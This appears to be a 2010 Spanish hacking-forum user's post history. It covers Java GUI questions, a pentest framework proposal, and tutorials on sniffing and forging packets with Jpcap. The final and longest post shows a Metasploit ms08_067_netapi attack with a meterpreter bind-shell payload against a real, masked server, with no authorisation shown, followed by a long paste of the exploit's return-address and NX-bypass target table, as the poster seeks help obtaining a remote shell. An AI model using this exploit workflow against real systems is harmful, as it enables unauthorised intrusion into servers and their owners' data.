|
92
|
Programación / ASM / MMM por donde empiezo? [Pregunta del millón]
|
en: 7 Marzo 2010, 19:31 pm
|
Haber antes de nada aclarar que de ASM se lo que he podido aprender debuggeando apps: Que EIP apunta a la siguiente direciond e memoria que va ejecutar el procesador Algunos registros... que con ADD añadimos datos a un regsitro y se suman....
Y que no dispongo d emedios para comprar ningun libro Algun PDF, paper, o guia, aunque sea un hi world bien explicado
Me conformo con poder hacer algo por mi cuenta.
Saludos
|
|
|
94
|
Programación / Java / Duda referente a la ventanita estilo JS
|
en: 30 Enero 2010, 19:43 pm
|
Hola a todos, ya he conseguido que al pasar el mouse por un cierto elemento de mi gui aparezca la ventanita informativa, pero ocurre un problema, que yo quiero que al movemer por el elemento donde sale la ventanita se mueva etsa tambien, y es que cuando la invoco al entrar en el elemento el elemento pierdo control ya que la ventanita esta en primer palno y el elemento deja de escuchar al mouse.
Como puedo hacer para que el eleemto siga escuchando aunque haya algo delante?
Saludos
|
|
|
95
|
Programación / Java / Elementos Drag 'n Drop
|
en: 30 Enero 2010, 17:36 pm
|
Hola a tod@s de nuevo vengo para consultares sobre la existencia de una libreria en java. Quiero hacer una red sinaptica y quiero hacerlo con elementos tipo drag 'n drop, osea que tenga una especie de escritorio donde pueda añadir nuevos elementos, moverlos y elmininarlos libremente sobre una zona de trabajo. Si quereis ver algun ejemplo existe una poderosisima aplicacion en java llamada maltego que usa lo que busco: Alguna idea sobre lo que busco? Saludos
|
|
|
96
|
Programación / Java / NovaXplosion Framework - Framework de pentest [Unete al desarrollo!]
|
en: 23 Enero 2010, 20:13 pm
|
Hola a todos, vengo a proponeros una genialidad o una locura (eso lo dejo a vuestro gusto), un framework de pentest. La seguridad informatica es algo que incumbe a todos, y como todo lo que es importante en esta vida, hay que estar preparados, por esto es bueno que si hay que dedicarse a hacer un buen soft de este tipo, mejor es que sea multiplataforma y con la potencia de java. La idea no es una maquina de hacking, si no de auditoria, exportación de informes, trabajo en equipo, escaneo persistente... He aqui las caracteristicas basicas: - Capacidad para usar exploits descargados de Milw0rm con el exploitDB
- AutoXplosion: Usa todas los exploits que haya para cierto puerto-aplicación y encontrar la autentica vulnerabilidad
- Importación desde nessus y nmap con visualización grafica de arbol de las vulnerabilidades
- Exportación de resultados a pdf y html, para entregar el informe completo
- Busqueda de posibles soluciones usando la information gathering, y una pequeña base de datos sobre las vulnerabilidades mas conocidas y como repararlos-parchearlos
- Capacidad para conectar varios framework para trabajar en grupo, enviar datos, compartir información...
- Escáner de puertos integrado propio
Ya tengo hechas varias cosas, pero he pensado que hay gente a la que le interesaria colaborar con esto, asi que me abro a propuestas-reclutamiento de desarrolladores. La idea definitiva, es crear una aplicación que sirva para protejer un sistema, y ayudar a los auditores informaticos a tener una herramienta que sirva para dar informes y maneras de protejer un sistema. Todo esto no es mas que un voceto de lo que en un futuro, pretendo que sea. Saludos
|
|
|
97
|
Programación / Java / Ventanita estilo JS emergente
|
en: 18 Enero 2010, 22:01 pm
|
Hola a todos, me gustaria saber como poner esas ventanitas emergente tan modernas que siguen al mouse, que ponen en paginas web "sofisticadas" (si sofisticadas...) que pasas el ratón encima de un link y te aparece una ventanita informativa cerca del mouse y se va cuando sales del enlace. He pensado hacerlo con el motor de scripting rhino pero no veo la manera puesto que es javascript a java, y no se como hacerlo de manera equitativa y constructiva (definitivamente soy un chaquetero...) me refiero a poder ponerle una imagen diseñarlo y tal que no se un simple contextMenu descriptivo de java, si no con imagenes y eso.
Alguna idea?
Parto de 0.
Saludos
|
|
|
98
|
Programación / Java / [Tutorial]Creación de un sniffer (Pasos avanzados) #2
|
en: 9 Enero 2010, 19:06 pm
|
PROGRAMACIÓN DE RED EN JAVA #2Lectura y envio de paquetes, filtros, manipulación de paquetes....Hola a tod@s y bienvenid@s una vez mas a esta entrega, sobre el desarrollo de nuestro propio sniffer. Como prometí en mi anterior host, en esta ocasión vamos a tratar los siguientes temas: - Envio y lectura de paquetes completo (en este casi solo he puesto code).
- Escritura de los paquetes leidos en un fichero, asi como lectura de los paquetes:
Ejemplo práctico de leer paquetes, guardarlos en un archivo y re-enviarlos.- Filtros de lectura de paquetes, para nuestro programa y tambien para wireshark y otros.
Bueno, para refrescar un poco la memoria... En la parte anterior a esta, comentabamos y aprendimos a saber que interfaces de red teniamos conectadas,estructurar y visualizar su información, como la direción mac, la ip, nombre de la interfaz de red... Esta vez vamos a ir un poco mas lejos, vamos a recibir y escribir paquetes. Bien empezamos, por algo que ya enseñé en el post anterior, leer paquetes de red, aqui el codigo: JpcapCaptor captor=JpcapCaptor.openDevice(device[index], 65535, false, 20); for(int i=0;i<10;i++){ //Capturar un paquete simple y muestrearlo System. out. println(captor. getPacket()); } captor.close();
Esta vez si que voy a explicar mas a fondo la clase JpcapCaptor, primero de todo decir, que es la clase que se encarga tramitar entre los paquetes de red y las interfaces, etsamos con esta clase, configurando la interface, el puerto, el modo, y el timeout de lectura: Jpcap.openDevice(indice interfaz, puerto, modo promiscuo, timeout de lectura);
Ahora que esta explicada, vamos a a profundizar el codigo completo: - Primero de todo tenemos la declaración/encapsulación del objeto PcapCaptor, con el que ponemos a la escucha de paquetes a una interface. Para ello hemos indicado al programa con argumentos que, lo haga con la interfaz que esta en el indice index(int), sobre el puerto 65535, modo promiscuo desactivado y con un timeout de lectura de 20 ms.
- En segundo lugar hemos creado un bucle lógico-condicional con el que leemos durante 10 loops con un timeout de 20 ms, por tanto leemos un maximo de 10 paquetes, si alguno se retrasa mas de 20 ms no lo leerá.
- Y por ultimo cerramos la interfaz y la quitamos de la escucha de paquetes.
Bien ahora sabemos leer paquetes, ahora vamos a ser mas especificos, con la el tipo de captura, vamos a filtrar los paquetes, para ello vamos a usar el metodo setFilter() de PcapCaptor, veamos como: JpcapCaptor captor=JpcapCaptor.openDevice(device[index], 65535, false, 20); //Exclusivizamos la captura de paquetes para IPv4/TCP captor.setFilter("ip and tcp", true);
Bien veamos, hemos dicho al captor de paquetes que solo coja los de tcp y ip (IPv4). Esto es sencillo, pero saber todo esto de poco nos vale si tan solo capturamos paquetes, vamos a capturarlos y a guardarlos en un archivo de texto plano, para ello haremos uso de JpcapWriter: JpcapCaptor captor=JpcapCaptor.openDevice(device[index], 65535, false, 20); //OPertura de archivo JpcapWriter writer=JpcapWriter.openDumpFile(captor,"yourfilename");
JpcapWriter nos proporciona un metodo para escribir archivos con el contenido del capturador, este metodo es openDumpFile, en el primer argumento le indicamos que obejto JpacpCaptor recive para escribir y en el segundo, indicamos con una string que archivo vamos a escribir. No creo que haya complicaciones, quizas alguna FileNotFoundException, pero no mas. Ahora toca escribirlos con un bucle lógico, combinando lo anterior con la escritura: JpcapCaptor captor=JpcapCaptor.openDevice(device[index], 65535, false, 20); //Opertura de archivo JpcapWriter writer=JpcapWriter.openDumpFile(captor,"yourfilename"); for(int i=0;i<10;i++){ //Captura un paquete sencillo Packet packet=captor.getPacket(); //Guardar en el archivo abierto writer.writePacket(packet); } writer.close();
Con esto abriremos, leeremos y escribiremos paquetes en un archivo en concreto. Bien ahora que hemos leido paquetes, los hemos dumpeado a un fichero, vamos a leerlos y a maquinar con ellos: //Abre el archivo donde teniamos los apquetes leidos JpcapCaptor captor=JpcapCaptor.openFile("yourfilename"); while(true){ //Lee el archivo abierto Packet packet=captor.getPacket(); //Si ocurre algo malo, algun erro u algo , rompemos el bucle if(packet==null || packet==Packet.EOF) break; //Printeamos el paquete leido } captor.close();
El ejemplo es claro, pero quiero que ahora penseis, si recivimos paquetes, por ejemplo estando en un mitm, los leemos, y modificamos de manera automatizada con algun bucle, y desciframos información de estos, estamos ante una herramienta muy potente, y creada por nosotros, totalmente personalizable. Bien ya dominamos la lectura y modificación de paquetes (si hombre, aunque no lo haya explicado sabeis que se puede modificar, por bytes, por String, por chars...), ahora toca el envio de paquetes, jeje.... //Abre la interface para envio JpcapSender sender=JpcapSender.openDevice(devices[index]); //Crea un paquete TCP personalizado con puertos y mierdas de esas xD como veis hay muchas opciones TCPPacket p=new TCPPacket(12,34,56,78,false,false,false,false,true,true,true,true,10,10); //Parametros de IPv4 p.setIPv4Parameter(0,false,false,false,0,false,false,false,0,1010101,100,IPPacket.IPPROTO_TCP, //El campo data del paquete p.data=("data").getBytes(); //Crea un paquete tipo Ethernet para el envio EthernetPacket ether=new EthernetPacket(); //Pone la frame como tipo IP ether.frametype=EthernetPacket.ETHERTYPE_IP; //Pone las mac de envio y recpcion ether.src_mac=new byte[]{(byte)0,(byte)1,(byte)2,(byte)3,(byte)4,(byte)5}; ether.dst_mac=new byte[]{(byte)0,(byte)6,(byte)7,(byte)8,(byte)9,(byte)10}; //Envia el datalink al paquete para enviarlo p.datalink=ether; //Envia el paquete sender.sendPacket(p); sender.close();
Bien, para esto tendriais que ler algo sobre paquetes de red, wifi netowrks y esas cosas, en la secion de seguridad wireless hay mucho relacionado, pero comentar algo, para que veais que esto tiene un uso. Bien si empezamos a leer paquetes, y reenviamos esos paquetes, podemos provocar reaciones extrañas, si hacemos esto de manera masvia cosas malevolas(que no debeis hacer sin permiso del que se compromete, porque ni yo ni elhacker.net se hacen responsables). Investigad, probad y no murais en el intento. En el proximo tutorial hablaremos sobre el diseño final de un sniffer, y probablemente ya tenga el source para postearlo. Un saludo a tod@s y espeor que os guste.
|
|
|
99
|
Programación / Java / [Tutorial #1]Primer paso para crear un sniffer en java
|
en: 8 Enero 2010, 23:07 pm
|
PROGRAMACIÓN DE RED EN JAVAPaquetes TCP/UDP, conexiones de red, interfaces...Hola a todos, recientemente me he puesto a estudiar las posibilidades de java como sniffer, asi que voy a poner lo que he aprendido, en unos cuantos tutoriales, y acabremos haciendo un sniffer. Primero de todo decir que para todo esto estoy usando la libreria: JPCAP -------> http://netresearch.ics.uci.edu/kfujii/jpcap/doc/download.htmlBien cabe comentar tambien que para ejecutar los ejemplos de los tutos, hace falta hacerlo bajo ROOT, asi que si no funciona, una psoible causa es esa. Bien en el primer tutorial vamos a crear una mini-aplicacion tipo iwconfig-ifconfig que nos enumere todas las interfaces conectadas al equipo, bien empecemos: Primero de todo hay que crear la lista de dispositivos, encapsulando la clase NetworkInterface a modo de array o matriz (para luego leer los interfaces usando un indice sencillo): NetworkInterface[] devices = JpcapCaptor.getDeviceList();
Le asignamos a la matriz todos los dispositivos mediante el metodo getDEviceList() de la clase JpcapCaptor. Una vez hecho estoy, vamos a recorrer el array con un bucle logico usando como limitador el length (longitud) del array: for (int i = 0; i < devices.length; i++)
Muy sencillo, y ahora una vez estamos recorriendo vamos a mostrar informacion de los dispositivos, usando los metodos NetworkInterface: //Metodo name para sacar el nombre la interface System. out. println("Nombre de interface: "+devices [i ]. name + "\n======================================\n" + devices [i ]. description); //Metodo datalink_name para sacar el nombre de este System. out. println("Nombre del datalink: "+devices [i ]. datalink_name + "\n==========================================\n" + devices [i ]. datalink_description+".\n"); //Esta claro no? xD System. out. print("Direción MAC: "); for (byte b : devices[i].mac_address)
Bien con etso ultimo hemos visto de manera completa, como sacar información de todos los dispositivos de red que haya conectados al equipo, vamos a profundizarlo un poquito mas: for (NetworkInterfaceAddress a : devices[i].addresses) System. out. println(" address:"+a. address + " " + a. subnet + " "+ a. broadcast);
Con eso, como es evidente, sacaremos la direcion de red, ip, mascara de red y demás. Mmm esto esta muy bien, pero... yo quiero jugar con la red diran otros, pues os diré que esto lo reservo para el siguiente tuto, pero os pondre un pequeño adelanto para que vallais jugando y probando cosas si, quereis claro... Vamos a leer 10 paquetes de red en un puerto determinado y una interface concreta: JpcapCaptor captor=JpcapCaptor.openDevice(device[indice], 65535, false, 1); for(int i=0;i<10;i++){ //Capturamos un paquete y lo muestreamos System. out. println(captor. getPacket()); } captor.close();
Como veis, el bucle se para en el decimo loop, y como leemos un paquete por loop, solo leemos 10 paquetes,y lo hacemos sobre la interface (hay que marcara que indice de interface con el int indice que correpsonde al indice del array). En el puerto 65535, aqui escojemos que puerto queremos sniffar, leer, o escribir en un futuro no muy lejano paquetes. El tercer parametro no es relevante ahora, pero ma starde lo explicaré. El cuarto parametro es el que nos indica cuantos paquetes por cada llamada a getPacket() leemos, si ponemos envezde uno, 20, leeremos 20 paquetes por cada llamada a getPacket(), y por tanto 20 paquetes por loop, lo que viene a ser 10*20 = 200 paquetes. Bueno, ahora os dejo un ejemplo para escritura de paquetes: JpcapSender sender=JpcapSender.openDevice(devices[index]); TCPPacket p=new TCPPacket(12,34,56,78,false,false,false,false,true,true,true,true,10,10); p.setIPv4Parameter(0,false,false,false,0,false,false,false,0,1010101,100,IPPacket.IPPROTO_TCP, p.data=("data").getBytes(); EthernetPacket ether=new EthernetPacket(); ether.frametype=EthernetPacket.ETHERTYPE_IP; ether.src_mac=new byte[]{(byte)0,(byte)1,(byte)2,(byte)3,(byte)4,(byte)5}; ether.dst_mac=new byte[]{(byte)0,(byte)6,(byte)7,(byte)8,(byte)9,(byte)10}; p.datalink=ether; sender.sendPacket(p); sender.close();
El codigo anterior, lo que hace es enviar un paquete en la interfaz de red (paquete de tipo TCP/IPv4/Ethernet), usando unos puertos determinados, entre dos hosts. En el proximo tutorial aprenderemos a: - Envio y lectura de paquetes completo (en este casi solo he puesto code).
- Escritura de los paquetes leidos en un fichero, asi como lectura de los paquetes:
Ejemplo práctico de leer paquetes, guardarlos en un archivo y re-enviarlos.- Filtros de lectura de paquetes, para nuestro programa y tambien para wireshark y otros.
Y mucho mas! Cuando acabe todo pondre el source de mi sniffer de red, en java bajo ide netbeans para que todos se beneficien y aprendan. Un saludo y gracias por aguantarme xD (que leer esto no es moco de pavo)
|
|
|
100
|
Seguridad Informática / Hacking / Problema para conseguir remote shell
|
en: 8 Enero 2010, 17:07 pm
|
Hola a todos, estoy auditando un servidor, que por la cantidad de puertos abiertos parece ser muy vulnerable, pero como ya comente hace tiempo, no puedo atacarle mediante el ms08_067_netapi, en puerto 445 abierto (sip, esta abierto), por que no detecta bien el paquete de idiomas del guind0$, estos son los puertos abiertos (que no se os caiga la baba): 7/tcp open echo 9/tcp open discard 13/tcp open daytime 17/tcp open qotd 19/tcp open chargen 21/tcp open ftp 25/tcp open smtp 53/tcp open domain 80/tcp open http 110/tcp open pop3 135/tcp open msrpc 139/tcp open netbios-ssn 443/tcp open https 445/tcp open microsoft-ds 1025/tcp open NFS-or-IIS 1027/tcp open IIS 1028/tcp open unknown 1029/tcp open ms-lsa 1030/tcp open iad1 1031/tcp open iad2 1455/tcp open esl-lm 3306/tcp open mysql 3389/tcp open ms-term-serv 8009/tcp open ajp13 8080/tcp open http-proxy 8085/tcp open unknown 8402/tcp open unknown 8443/tcp open https-alt
Bien ahora viene la parte técnica en la cual fallo: debci@0x81:/pentest/exploits/framework3$ sudo ./msfconsole [sudo] password for debci:
_ | | o _ _ _ _ _|_ __, , _ | | __ _|_ / |/ |/ | |/ | / | / \_|/ \_|/ / \_| | | | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/ /| \|
=[ metasploit v3.3.4-dev [core:3.3 api:1.0] + -- --=[ 491 exploits - 225 auxiliary + -- --=[ 251 payloads - 23 encoders - 8 nops =[ svn r8082 updated today (2010.01.07)
msf > use exploit/windows/smb/ms08_067_netapi 3 RHOST => xxxxxxxxxxtapi) > set RHOST xx.xx.xx.xx rpreter/bind_tcpmsf exploit(ms08_067_netapi) > set PAYLOAD windows/mete PAYLOAD => windows/meterpreter/bind_tcp msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler [*] Automatically detecting the target... [*] Fingerprint: Windows 2003 R2 Service Pack 2 - lang:Unknown [*] Could not determine the exact language pack [*] Exploit completed, but no session was created. msf exploit(ms08_067_netapi) >
Entonces, me puse a investigar (siguiendo un link que el compañero kamsky me proporcionó): http://www.pentester.es/2009/11/por-que-no-consigo-shell-con-mi.htmlBien, pero en esa guia, se explica como hacerlo trasteando con un proceso .exe de windows, y yo trabajo bajo linux, e aqui el problema, de todos modos me puse a invetsigar sobre el exploit, en mi caso se ejecuta bajo el interprete del framework metasploit, y para mi sorpresa, si que tiene el idioma castellano, el cual es el probable del host, observen: # # UNIVERSAL TARGETS #
# # Antoine's universal for Windows 2000 # Warning: DO NOT CHANGE THE OFFSET OF THIS TARGET # [ 'Windows 2000 Universal', { 'Ret' => 0x001f1cb0, 'Scratch' => 0x00020408, } ], # JMP EDI SVCHOST.EXE
# # Standard return-to-ESI without NX bypass # Warning: DO NOT CHANGE THE OFFSET OF THIS TARGET # [ 'Windows XP SP0/SP1 Universal', { 'Ret' => 0x01001361, 'Scratch' => 0x00020408, } ], # JMP ESI SVCHOST.EXE
# # ENGLISH TARGETS #
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP2 English (NX)', { 'Ret' => 0x6f88f727, 'DisableNX' => 0x6f8916e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP3 English (NX)', { 'Ret' => 0x6f88f807, 'DisableNX' => 0x6f8917c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Standard return-to-ESI without NX bypass [ 'Windows 2003 SP0 Universal', { 'Ret' => 0x0100129e, 'Scratch' => 0x00020408, } ], # JMP ESI SVCHOST.EXE
# Standard return-to-ESI without NX bypass [ 'Windows 2003 SP1 English (NO NX)', { 'Ret' => 0x71bf21a2, 'Scratch' => 0x00020408, } ], # JMP ESI WS2HELP.DLL
# Brett Moore's crafty NX bypass for 2003 SP1 [ 'Windows 2003 SP1 English (NX)', { 'RetDec' => 0x7c90568c, # dec ESI, ret @SHELL32.DLL 'RetPop' => 0x7ca27cf4, # push ESI, pop EBP, ret @SHELL32.DLL 'JmpESP' => 0x7c86fed3, # jmp ESP @NTDLL.DLL 'DisableNX' => 0x7c83e413, # NX disable @NTDLL.DLL 'Scratch' => 0x00020408, } ],
# Standard return-to-ESI without NX bypass [ 'Windows 2003 SP2 English (NO NX)', { 'Ret' => 0x71bf3969, 'Scratch' => 0x00020408, } ], # JMP ESI WS2HELP.DLL
# Brett Moore's crafty NX bypass for 2003 SP2 [ 'Windows 2003 SP2 English (NX)', { 'RetDec' => 0x7c86beb8, # dec ESI, ret @NTDLL.DLL 'RetPop' => 0x7ca1e84e, # push ESI, pop EBP, ret @SHELL32.DLL 'JmpESP' => 0x7c86a01b, # jmp ESP @NTDLL.DLL 'DisableNX' => 0x7c83f517, # NX disable @NTDLL.DLL 'Scratch' => 0x00020408, } ],
# # NON-ENGLISH TARGETS - AUTOMATICALLY GENERATED #
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP2 Arabic (NX)', { 'Ret' => 0x6fd8f727, 'DisableNX' => 0x6fd916e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP2 Chinese - Traditional / Taiwan (NX)', { 'Ret' => 0x5860f727, 'DisableNX' => 0x586116e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP2 Chinese - Simplified (NX)', { 'Ret' => 0x58fbf727, 'DisableNX' => 0x58fc16e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP2 Chinese - Traditional (NX)', { 'Ret' => 0x5860f727, 'DisableNX' => 0x586116e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP2 Czech (NX)', { 'Ret' => 0x6fe1f727, 'DisableNX' => 0x6fe216e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP2 Danish (NX)', { 'Ret' => 0x5978f727, 'DisableNX' => 0x597916e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP2 German (NX)', { 'Ret' => 0x6fd9f727, 'DisableNX' => 0x6fda16e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP2 Greek (NX)', { 'Ret' => 0x592af727, 'DisableNX' => 0x592b16e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP2 Spanish (NX)', { 'Ret' => 0x6fdbf727, 'DisableNX' => 0x6fdc16e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP2 Finnish (NX)', { 'Ret' => 0x597df727, 'DisableNX' => 0x597e16e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP2 French (NX)', { 'Ret' => 0x595bf727, 'DisableNX' => 0x595c16e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP2 Hebrew (NX)', { 'Ret' => 0x5940f727, 'DisableNX' => 0x594116e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP2 Hungarian (NX)', { 'Ret' => 0x5970f727, 'DisableNX' => 0x597116e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP2 Italian (NX)', { 'Ret' => 0x596bf727, 'DisableNX' => 0x596c16e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP2 Japanese (NX)', { 'Ret' => 0x567fd3be, 'DisableNX' => 0x568016e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP2 Korean (NX)', { 'Ret' => 0x6fd6f727, 'DisableNX' => 0x6fd716e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP2 Dutch (NX)', { 'Ret' => 0x596cf727, 'DisableNX' => 0x596d16e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP2 Norwegian (NX)', { 'Ret' => 0x597cf727, 'DisableNX' => 0x597d16e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP2 Polish (NX)', { 'Ret' => 0x5941f727, 'DisableNX' => 0x594216e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP2 Portuguese - Brazilian (NX)', { 'Ret' => 0x596ff727, 'DisableNX' => 0x597016e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP2 Portuguese (NX)', { 'Ret' => 0x596bf727, 'DisableNX' => 0x596c16e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP2 Russian (NX)', { 'Ret' => 0x6fe1f727, 'DisableNX' => 0x6fe216e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP2 Swedish (NX)', { 'Ret' => 0x597af727, 'DisableNX' => 0x597b16e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP2 Turkish (NX)', { 'Ret' => 0x5a78f727, 'DisableNX' => 0x5a7916e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP3 Arabic (NX)', { 'Ret' => 0x6fd8f807, 'DisableNX' => 0x6fd917c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP3 Chinese - Traditional / Taiwan (NX)', { 'Ret' => 0x5860f807, 'DisableNX' => 0x586117c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP3 Chinese - Simplified (NX)', { 'Ret' => 0x58fbf807, 'DisableNX' => 0x58fc17c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP3 Chinese - Traditional (NX)', { 'Ret' => 0x5860f807, 'DisableNX' => 0x586117c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP3 Czech (NX)', { 'Ret' => 0x6fe1f807, 'DisableNX' => 0x6fe217c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP3 Danish (NX)', { 'Ret' => 0x5978f807, 'DisableNX' => 0x597917c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP3 German (NX)', { 'Ret' => 0x6fd9f807, 'DisableNX' => 0x6fda17c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP3 Greek (NX)', { 'Ret' => 0x592af807, 'DisableNX' => 0x592b17c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP3 Spanish (NX)', { 'Ret' => 0x6fdbf807, 'DisableNX' => 0x6fdc17c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP3 Finnish (NX)', { 'Ret' => 0x597df807, 'DisableNX' => 0x597e17c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP3 French (NX)', { 'Ret' => 0x595bf807, 'DisableNX' => 0x595c17c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP3 Hebrew (NX)', { 'Ret' => 0x5940f807, 'DisableNX' => 0x594117c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP3 Hungarian (NX)', { 'Ret' => 0x5970f807, 'DisableNX' => 0x597117c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP3 Italian (NX)', { 'Ret' => 0x596bf807, 'DisableNX' => 0x596c17c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP3 Japanese (NX)', { 'Ret' => 0x567fd4d2, 'DisableNX' => 0x568017c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP3 Korean (NX)', { 'Ret' => 0x6fd6f807, 'DisableNX' => 0x6fd717c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
